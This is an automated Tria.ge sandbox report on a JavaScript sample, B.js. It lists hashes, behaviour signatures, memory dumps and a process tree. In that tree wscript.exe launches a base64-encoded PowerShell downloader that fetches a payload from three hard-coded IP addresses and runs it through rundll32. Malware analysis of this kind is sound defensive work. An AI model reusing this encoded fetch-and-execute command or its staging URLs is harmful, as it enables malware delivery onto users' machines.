Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    04/05/2023, 10:34

General

  • Target

    B.js

  • Size

    57KB

  • MD5

    52d96ebabe2bc08cb504f4b7b29b5f65

  • SHA1

    a609c8c0fbd4867421d65fa79834c3527cbb7690

  • SHA256

    ef023b0a3aa55f424298cb1f64a496392c61c02b8167b04feedc7cc31d123f2b

  • SHA512

    046cbcc8c80e2688432eaf1cf957388818f828642b6328fea5553adac4a25813ec875678c5c501577dc7c7288c9adbffd71195995aab18d51a76e9cff7b30c30

  • SSDEEP

    768:VyMNhRhlTosj7PJMenmwELqOttPki0P9B9VosNMaEiGHGr6kQ7Ig1KzHyyLdSmKl:fUsZnwGGkQ7A0xherXT4EANnOvwr

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\B.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\B.js" UnpiquedUnpreventative WiregrassUncrisp inthralls indiscussible
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AZABlAHIAcABpAHQAYwBoAEUAeABoAGkAYgBpAHQAaQBvAG4AaQB6AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMQA5AC4ANwA5AC8AVQBYAFkALwBxAHQAUgBHAGgAaQBVAHAANgBlADYALABoAHQAdABwADoALwAvADEAMAA0AC4AMgAzADQALgAxADEAOAAuADEANQAzAC8AZQBoAHQAdABSADMALwBBAFcAawA0AHYASAAsAGgAdAB0AHAAOgAvAC8AMQA3ADIALgA4ADYALgAxADIAMwAuADEAMAAzAC8ANQBNAEcAeQBWAC8ANwB1ADcAZQBrADYARgA2ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGMAaABvAGsAZQBiAGUAcgByAHkAUQB1AGUAYQBjAGgAaQBlAHIAIABpAG4AIAAkAHUAbgBkAGUAcgBwAGkAdABjAGgARQB4AGgAaQBiAGkAdABpAG8AbgBpAHoAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAYwBoAG8AawBlAGIAZQByAHIAeQBRAHUAZQBhAGMAaABpAGUAcgAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANgAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBDAEEARwBrAEEAYwB3AEIAaABBAEcAYwBBAGMAZwBCAGwAQQBDADQAQQBaAEEAQgBwAEEASABNAEEAYwBBAEIAcwBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBVAEEAQgBvAEEASABrAEEAYgBBAEIAcwBBAEcAOABBAGMAQQBCAHYAQQBHAFEAQQBiAHcAQgAxAEEASABNAEEATABBAEIAVQBBAEcAawBBAGIAUQBCAGwAQQBEAHMAQQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1628

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1628-58-0x000000001B140000-0x000000001B422000-memory.dmp

    Filesize

    2.9MB

  • memory/1628-59-0x0000000002460000-0x0000000002468000-memory.dmp

    Filesize

    32KB

  • memory/1628-60-0x00000000022E0000-0x0000000002360000-memory.dmp

    Filesize

    512KB

  • memory/1628-62-0x00000000022E0000-0x0000000002360000-memory.dmp

    Filesize

    512KB

  • memory/1628-61-0x00000000022E0000-0x0000000002360000-memory.dmp

    Filesize

    512KB

  • memory/1628-63-0x00000000022E0000-0x0000000002360000-memory.dmp

    Filesize

    512KB